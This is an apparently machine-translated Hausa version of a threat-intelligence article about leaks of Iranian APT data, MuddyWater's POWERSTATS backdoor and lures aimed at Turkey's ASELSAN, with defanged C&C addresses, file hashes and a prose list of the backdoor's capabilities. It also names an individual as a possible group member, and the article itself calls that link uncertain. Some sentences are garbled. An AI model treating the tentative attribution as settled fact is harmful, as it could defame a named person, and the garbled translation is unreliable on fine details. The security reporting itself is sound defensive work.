Masu satar bayanan gwamnatin Iran na cikin babbar matsala. A duk lokacin bazara, mutanen da ba a san su ba sun buga "leaks na sirri" akan Telegram - bayanai game da kungiyoyin APT masu alaƙa da gwamnatin Iran - Rigar Mai и MuddyWater - kayan aikin su, wadanda abin ya shafa, haɗin kai. Amma ba game da kowa ba. A cikin watan Afrilu, kwararrun kungiyar IB sun gano wani leda na adiresoshin wasiku na kamfanin Turkiyya ASELSAN A.Ş, wanda ke samar da radiyon soja na dabara da na'urorin kariya na lantarki ga sojojin Turkiyya. Anastasia Tikhonova, Rukuni-IB Babban Jagoran Binciken Barazana, da Nikita Rostovtsev, ƙaramin manazarci a Group-IB, ya bayyana yadda harin da aka kai wa ASELSAN A.Ş kuma ya sami yiwuwar shiga. MuddyWater.
Haske ta hanyar Telegram
Leken asirin kungiyoyin APT na Iran ya fara ne da gaskiyar cewa wani Lab Doukhtegan Lambobin tushen kayan aikin APT34 guda shida (aka OilRig da HelixKitten), sun bayyana adiresoshin IP da wuraren da ke cikin ayyukan, da kuma bayanai kan mutane 66 da masu satar bayanai suka shafa, ciki har da Etihad Airways da Emirates National Oil. Lab Doookhtegan ya kuma fitar da bayanai game da ayyukan kungiyar a baya da kuma bayanan ma'aikatan Ma'aikatar Yada Labarai da Tsaro ta Iran da ake zargin suna da alaka da ayyukan kungiyar. OilRig wata ƙungiya ce ta APT mai alaƙa da Iran wacce ta wanzu tun kusan 2014 kuma tana kai hari ga ƙungiyoyin gwamnati, ƙungiyoyin kuɗi da na soja, da kamfanonin makamashi da na sadarwa a Gabas ta Tsakiya da China.
Bayan fallasa OilRig, leken ya ci gaba - bayanai game da ayyukan wata kungiya mai rajin kare kasa daga Iran, MuddyWater, ta bayyana a cikin duhu da kuma ta Telegram. Duk da haka, ba kamar na farko ba, a wannan karon ba lambobin tushe ne aka buga ba, amma zubarwa, ciki har da hotunan hotunan kariyar kwamfuta, uwar garken sarrafawa, da adiresoshin IP na wadanda aka kashe a baya. A wannan karon, masu satar bayanan Green Leakers sun dauki alhakin yabo game da MuddyWater. Sun mallaki tashoshi na Telegram da yawa da kuma shafukan duhu inda suke tallata da sayar da bayanan da suka shafi ayyukan MuddyWater.
Masu leken asiri na Intanet daga Gabas ta Tsakiya
MuddyWater ƙungiya ce da ke aiki tun 2017 a Gabas ta Tsakiya. Misali, kamar yadda masana Group-IB suka lura, daga watan Fabrairu zuwa Afrilu 2019, masu satar bayanan sirri sun gudanar da jerin sakwanni na wasiku da suka shafi gwamnati, kungiyoyin ilimi, kudi, sadarwa da kamfanonin tsaro a Turkiyya, Iran, Afganistan, Iraki da Azerbaijan.
Membobin ƙungiyar suna amfani da ƙofar baya na ci gaban kansu bisa PowerShell, wanda ake kira WUTA. Zai iya:
- tattara bayanai game da asusun gida da na yanki, sabar fayil ɗin samuwa, adiresoshin IP na ciki da na waje, suna da tsarin gine-ginen OS;
- aiwatar da kisa mai nisa;
- loda da zazzage fayiloli ta hanyar C&C;
- gano kasancewar shirye-shiryen lalata da aka yi amfani da su a cikin nazarin fayilolin ƙeta;
- rufe tsarin idan an sami shirye-shirye don nazarin fayilolin ƙeta;
- share fayiloli daga faifan gida;
- ɗaukar hotunan kariyar kwamfuta;
- musaki matakan tsaro a cikin samfuran Microsoft Office.
A wani lokaci, maharan sun yi kuskure kuma masu bincike daga ReaQta sun sami nasarar samun adireshin IP na ƙarshe, wanda yake a Tehran. Idan aka yi la'akari da wuraren da kungiyar ta kai hari, da kuma manufofinta da suka shafi leken asiri ta yanar gizo, masana sun nuna cewa kungiyar tana wakiltar muradun gwamnatin Iran.
Alamun hariC&C:
- gladiator[.]tk
- 94.23.148[.]194
- 192.95.21[.]28
- 46.105.84[.]146
- 185.162.235[.]182
Fayiloli:
- 09aabd2613d339d90ddbd4b7c09195a9
- cfa845995b851aacdf40b8e6a5b87ba7
- a61b268e9bc9b7e6c9125cdbfb1c422a
- f12bab5541a7d8ef4bbca81f6fc835a3
- a066f5b93f4ac85e9adfe5ff3b10bc28
- 8a004e93d7ee3b26d94156768bc0839d
- 0638adf8fb4095d60fbef190a759aa9e
- eed599981c097944fa143e7d7f7e17b1
- 21aebece73549b3c4355a6060df410e9
- 5c6148619abb10bb3789dcfb32f759a6
Turkiyya na fuskantar hari
A ranar 10 ga Afrilu, 2019, kwararrun kungiyar Group-IB sun gano wata ledar adiresoshin wasiku na kamfanin Turkiyya ASELSAN A.Ş, kamfani mafi girma a fannin samar da lantarki a Turkiyya. Kayayyakin sa sun hada da radar da na'urorin lantarki, electro-optics, avionics, na'urori marasa matuki, kasa, na ruwa, makamai da tsarin tsaron iska.
Nazarin ɗaya daga cikin sababbin samfuran POWERSTATS malware, masana Group-IB sun ƙaddara cewa ƙungiyar MuddyWater na maharan sun yi amfani da yarjejeniyar lasisi tsakanin Koç Savunma, wani kamfani da ke samar da mafita a fagen bayanai da fasahar tsaro, da Tubitak Bilgem. , Cibiyar bincike ta tsaro ta bayanai da fasahar zamani. Wanda ya tuntubi Koç Savunma shine Tahir Taner Tımış, wanda ya rike mukamin Manajan Shirye-shirye a Koç Bilgi ve Savunma Teknolojileri A.Ş. daga Satumba 2013 zuwa Disamba 2018. Daga baya ya fara aiki a ASELSAN A.Ş.
Samfurin daftarin lalata
Bayan mai amfani ya kunna macros qeta, ana zazzage ƙofofin baya na POWERSTATS zuwa kwamfutar wanda aka azabtar.
Godiya ga metadata na wannan takaddar yaudara (MD5: 0638adf8fb4095d60fbef190a759aa9e) masu bincike sun sami damar samun ƙarin samfurori guda uku waɗanda ke ɗauke da dabi'u iri ɗaya, gami da kwanan wata da lokacin ƙirƙirar, sunan mai amfani, da jerin macro da ke ƙunshe:
- ListOfHackedEmails.doc (eed599981c097944fa143e7d7f7e17b1)
- asd.doc (21aebece73549b3c4355a6060df410e9)
- F35-Specifications.doc (5c6148619abb10bb3789dcfb32f759a6)
Hoton hoto na metadata iri ɗaya na takaddun lalata daban-daban
Daya daga cikin takardun da aka gano mai suna ListOfHackedEmails.doc ya ƙunshi jerin adiresoshin imel 34 na yankin @aselsan.com.tr.
Kwararru na rukuni-IB sun bincika adiresoshin imel a cikin bayanan da aka samu a bainar jama'a kuma sun gano cewa 28 daga cikinsu an daidaita su a cikin leaks ɗin da aka gano a baya. Bincika cakuda leaks ɗin da aka samu ya nuna kusan 400 na musamman na shiga masu alaƙa da wannan yanki da kalmomin shiga gare su. Mai yiyuwa ne maharan sun yi amfani da wannan bayanan da ake samu a bainar jama'a don kai hari ga ASELSAN A.Ş.
Hoton hoton daftarin aiki ListOfHackedEmails.doc
Hoton hoto na jerin sama da 450 nau'i-nau'i-nau'i-nau'i na kalmar shiga da aka gano a cikin leaks na jama'a
Daga cikin samfuran da aka gano akwai kuma takarda mai take F35-Specifications.doc, yana nufin jirgin yakin F-35. Takardun koto wani ƙayyadaddun bayanai ne na F-35 mai yawan rawar soja-bam, yana nuna halaye da farashin jirgin. Batun wannan daftarin yaudara yana da alaka kai tsaye da kin Amurka na kin samar da F-35 bayan da Turkiyya ta sayi tsarin S-400 da kuma barazanar mika bayanai kan F-35 Walƙiya II zuwa Rasha.
Dukkanin bayanan da aka samu sun nuna cewa manyan wuraren da MuddyWater ke kai hare-hare ta yanar gizo sune kungiyoyi da ke Turkiyya.
Wanene Gladiyator_CRK da Nima Nikjoo?
Tun da farko, a cikin Maris 2019, wani mai amfani da Windows ya ƙirƙira wasu takardu masu ɓarna a ƙarƙashin sunan Gladiyator_CRK. Waɗannan takaddun kuma sun rarraba bayan POWERSTATS kuma an haɗa su zuwa uwar garken C&C mai suna iri ɗaya gladiator[.]tk.
Wataƙila an yi wannan bayan mai amfani Nima Nikjoo ya buga akan Twitter a ranar 14 ga Maris, 2019, yana ƙoƙarin warware ɓoyayyen lambar da ke da alaƙa da MuddyWater. A cikin sharhin da aka yi wa wannan tweet, mai binciken ya ce ba zai iya raba alamomin sasantawa ga wannan malware ba, saboda wannan bayanin sirri ne. Abin takaici, an riga an goge sakon, amma alamun sa yana kan layi:
Nima Nikjoo shine mai Gladiyator_CRK profile a kan shafukan yanar gizo na bidiyo na Iran dideo.ir da videoi.ir. A kan wannan rukunin yanar gizon, yana nuna abubuwan amfani na PoC don kashe kayan aikin riga-kafi daga dillalai daban-daban da ketare akwatunan yashi. Nima Nikjoo ya rubuta game da kansa cewa shi kwararre ne kan harkokin tsaro na hanyar sadarwa, da kuma injiniyan baya-bayan nan kuma manazarcin malware wanda ke aiki da MTN Irancell, kamfanin sadarwa na Iran.
Hoton hotunan bidiyo da aka adana a cikin sakamakon binciken Google:
Daga baya, a ranar 19 ga Maris, 2019, mai amfani Nima Nikjoo a dandalin sada zumunta na Twitter ya canza sunansa zuwa Malware Fighter, sannan ya goge sakonni da sharhi masu alaka. Hakanan an goge bayanan Gladiyator_CRK akan bidiyon hosting dideo.ir, kamar yadda aka yi a YouTube, kuma profile ɗin kanta an sake masa suna N Tabrizi. Koyaya, kusan wata guda bayan haka (16 ga Afrilu, 2019), asusun Twitter ya sake amfani da sunan Nima Nikjoo.
A yayin binciken, kwararrun rukunin-IB sun gano cewa an riga an ambaci Nima Nikjoo dangane da ayyukan ta'addanci ta yanar gizo. A cikin watan Agustan 2014, shafin yanar gizon Iran Khabarestan ya buga bayanai game da mutanen da ke da alaƙa da ƙungiyar masu aikata laifuka ta Intanet ta Cibiyar Nasr ta Iran. Wani bincike da FireEye ya gudanar ya nuna cewa Cibiyar Nasr ta kasance dan kwangilar APT33 kuma tana da hannu a hare-haren DDoS a bankunan Amurka tsakanin 2011 zuwa 2013 a wani bangare na yakin neman zabe mai suna Operation Ababil.
Don haka a cikin wannan shafin, an ambaci Nima Nikju-Nikjoo, wanda ke haɓaka malware don leken asirin Iraniyawa, da adireshin imel ɗinsa: gladiator_cracker@yahoo[.]com.
Hoton bayanan da aka danganta ga masu aikata laifuka ta yanar gizo daga Cibiyar Nasr ta Iran:
Fassara babban rubutu zuwa Rashanci: Nima Nikio - Mai Haɓaka Kayan leken asiri - Imel:.
Kamar yadda ake iya gani daga wannan bayanin, adireshin imel ɗin yana da alaƙa da adireshin da aka yi amfani da shi wajen kai harin da kuma masu amfani Gladiyator_CRK da Nima Nikjoo.
Bugu da ƙari, labarin 15 ga Yuni, 2017 ya bayyana cewa Nikjoo ya ɗan yi sakaci wajen aika nassoshi zuwa Cibiyar Tsaro ta Kavosh akan ci gaba. Ku ci cewa Cibiyar Tsaro ta Kavosh na samun goyon bayan gwamnatin Iran don tallafawa masu satar bayanan gwamnati.
Bayani game da kamfanin da Nima Nikjoo yayi aiki:
Mai amfani da Twitter Nima Nikjoo bayanin martabar LinkedIn ya jera wurin aikinsa na farko a matsayin Cibiyar Tsaro ta Kavosh, inda ya yi aiki daga 2006 zuwa 2014. A lokacin aikinsa, ya yi nazarin malware daban-daban, kuma ya yi maganin juzu'i da ayyukan da suka shafi ɓarna.
Bayani game da kamfanin Nima Nikjoo yayi aiki akan LinkedIn:
MuddyWater da girman kai
Yana da ban sha'awa cewa ƙungiyar MuddyWater tana kula da duk rahotanni da saƙon da masana tsaro suka buga game da su, har ma da gangan sun bar tutocin ƙarya da farko don jefar da masu bincike daga ƙamshi. Misali, harinsu na farko ya yaudari masana ta hanyar gano amfani da DNS Messenger, wanda galibi ke hade da kungiyar FIN7. A cikin wasu hare-haren, sun sanya zaren China a cikin lambar.
Bugu da ƙari, ƙungiyar tana son barin saƙonni ga masu bincike. Misali, ba sa son cewa Kaspersky Lab ya sanya MuddyWater a matsayi na 3 a cikin ƙimar barazanarsa na shekara. A daidai wannan lokacin, wani - mai yiwuwa ƙungiyar MuddyWater - ya ɗora PoC na wani amfani zuwa YouTube wanda ke hana riga-kafi na LK. Sun kuma bar sharhi a ƙarƙashin labarin.
Hotunan bidiyo akan kashe Kaspersky Lab riga-kafi da sharhin da ke ƙasa:
Har yanzu yana da wahala a iya yanke wata matsaya mai ma'ana game da shigar "Nima Nikjoo". Masana rukunin-IB suna la'akari da nau'i biyu. Nima Nikjoo, hakika, yana iya zama dan gwanin kwamfuta daga kungiyar MuddyWater, wanda ya fito fili saboda sakacinsa da kuma karuwar ayyukansa a kan hanyar sadarwa. Zabi na biyu kuma shi ne cewa da gangan wasu ‘yan kungiyar suka “ fallasa shi” don kawar da zato daga kansu. A kowane hali, Ƙungiyar-IB ta ci gaba da bincike kuma za ta ba da rahoton sakamakonta.
Amma game da APTs na Iran, bayan jerin leaks da leaks, mai yiwuwa za su fuskanci "bayyanawa" mai tsanani - za a tilasta wa masu kutse su canza kayan aikinsu da gaske, tsaftace hanyoyinsu kuma su sami yiwuwar "lalata" a cikin sahunsu. Masana dai ba su yi watsi da cewa ma za su dauki lokaci ba, amma bayan wani dan gajeren hutu, an ci gaba da kai hare-haren APT na Iran.
source: www.habr.com